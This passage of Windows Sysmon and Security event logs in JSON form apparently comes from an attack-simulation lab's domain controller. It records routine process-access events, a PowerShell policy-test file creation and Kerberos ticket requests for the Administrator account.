C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.951","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4360,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.951\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.951","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4361,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.951\r\nSourceProcessGUID: {A837DB8D-030D-5F25-0000-00106C530600}\r\nSourceProcessId: 4344\r\nSourceThreadId: 644\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-030D-5F25-0000-001067620600}\r\nTargetProcessId: 2968\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.951","SourceProcessGUID":"{A837DB8D-030D-5F25-0000-00106C530600}","SourceProcessId":"4344","SourceThreadId":"644","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-030D-5F25-0000-001067620600}","TargetProcessId":"2968","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4362,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.983\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-030D-5F25-0000-001067620600}\r\nTargetProcessId: 2968\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.983","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-030D-5F25-0000-001067620600}","TargetProcessId":"2968","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4363,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:13.983\r\nProcessGuid: {A837DB8D-030D-5F25-0000-001067620600}\r\nProcessId: 2968\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_s4kxrdv4.g5l.ps1\r\nCreationUtcTime: 2020-08-01 05:52:13.983","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:13.983","ProcessGuid":"{A837DB8D-030D-5F25-0000-001067620600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_s4kxrdv4.g5l.ps1","CreationUtcTime":"2020-08-01 05:52:13.983","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4364,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:14.029\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-030D-5F25-0000-001067620600}\r\nTargetProcessId: 2968\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:14.029","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-030D-5F25-0000-001067620600}","TargetProcessId":"2968","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4365,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:14.029\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-030D-5F25-0000-001067620600}\r\nTargetProcessId: 2968\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:14.029","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-030D-5F25-0000-001067620600}","TargetProcessId":"2968","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4366,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:14.076\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:14.076","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220479,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-1117747729-287425051-3091891954-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:14","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220480,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{A79C0059-3622-45CB-AE95-532C81A8115C}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{A79C0059-3622-45CB-AE95-532C81A8115C}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:52:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
